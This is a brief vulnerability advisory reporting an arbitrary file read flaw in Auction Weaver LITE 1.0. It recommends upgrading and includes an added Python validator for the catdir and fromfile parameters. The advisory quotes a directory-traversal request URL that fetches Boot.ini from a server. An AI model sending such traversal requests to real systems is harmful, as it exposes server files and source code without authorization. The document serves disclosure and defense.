
Auction Weaver Read Arbitrary Files

Vulnerability

    Auction Weaver

Affected

    Auction Weaver™ LITE 1.0

Description

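    Meliksah Ozoral found the following.  Auction Weaver allows remote
    users to read files from the server, including the source of files
    on the server.  The first request below reads a .dat file through
    the catdir and fromfile parameters; the second uses backslash
    directory traversal in catdir to request Boot.ini.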

        http://www.cgiscriptcenter.com/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=cat17&fromfile=967251278%2Edat
        http://www.cgiscriptcenter.com/cgi-bin/awl/auctionweaver.pl?flag1=1&catdir=\..\..\..\..\..\..\..\..\&fromfile=Boot.ini

Solution

    Upgrade to 1.2.
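
    For sites that must validate these parameters themselves, the
    following is an added example (not Auction Weaver's code, and not
    the vendor's 1.2 fix) of allowlisting catdir and fromfile and
    confirming the resolved path stays inside the data directory.  The
    name formats and DATA_ROOT are assumptions inferred from the first
    sample request above.

```python
import posixpath
import re
from urllib.parse import urlsplit, parse_qs

# Assumed formats, inferred from the legitimate sample request on the page.
CATDIR_RE = re.compile(r"cat\d+")
FROMFILE_RE = re.compile(r"\d+\.dat")
DATA_ROOT = "/srv/awl/data"  # hypothetical data directory


def safe_join(root, *parts):
    """Join parts under root; raise ValueError if the result leaves root."""
    # Treat "\" like "/" so Windows-style traversal is normalised as well.
    joined = posixpath.join(root, *parts).replace("\\", "/")
    path = posixpath.normpath(joined)
    if not path.startswith(root.rstrip("/") + "/"):
        raise ValueError("resolved path escapes data root")
    return path


def resolve_item(catdir, fromfile, root=DATA_ROOT):
    """Allowlist both parameters, then check containment as a second layer."""
    if not CATDIR_RE.fullmatch(catdir):
        raise ValueError("catdir not in expected form")
    if not FROMFILE_RE.fullmatch(fromfile):
        raise ValueError("fromfile not in expected form")
    return safe_join(root, catdir, fromfile)


def check_request(url):
    """Validate catdir/fromfile taken from a request URL; returns (ok, detail)."""
    # parse_qs percent-decodes values, so %2E is checked as ".".
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    catdir = query.get("catdir", [""])[0]
    fromfile = query.get("fromfile", [""])[0]
    try:
        return True, resolve_item(catdir, fromfile)
    except ValueError as exc:
        return False, str(exc)


if __name__ == "__main__":
    base = "http://www.cgiscriptcenter.com/cgi-bin/awl/auctionweaver.pl?flag1=1"
    # The two requests quoted in the advisory, used here only as parser input.
    for qs in ("&catdir=cat17&fromfile=967251278%2Edat",
               "&catdir=\\..\\..\\..\\..\\..\\..\\..\\..\\&fromfile=Boot.ini"):
        print(check_request(base + qs))
```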
